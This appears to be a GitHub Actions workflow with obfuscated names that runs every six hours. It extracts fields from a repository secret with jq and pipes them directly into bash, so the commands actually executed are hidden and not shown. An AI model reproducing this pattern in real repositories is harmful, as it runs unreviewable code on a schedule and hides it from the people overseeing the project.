name: dingruoyashh
on:
  workflow_dispatch:
  schedule:
    - cron: '51 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dingruoyashh
        env:
          jazi75939: ${{ secrets.jazi75939 }}
        run: |
          echo $jazi75939 | jq -r .nder28 | /bin/bash
          echo $j66 | jq -r .v992 | /bin/bash
          echo $koj10187 | jq -r .iqmzh4 | /bin/bash
          echo $slxl0409 | jq -r .bbtpe182 | /bin/bash
          echo $gwhyl86 | jq -r .jn8970 | /bin/bash
          echo $fs1 | jq -r .avbd5768 | /bin/bash
          echo $sfzs2 | jq -r .japol2 | /bin/bash

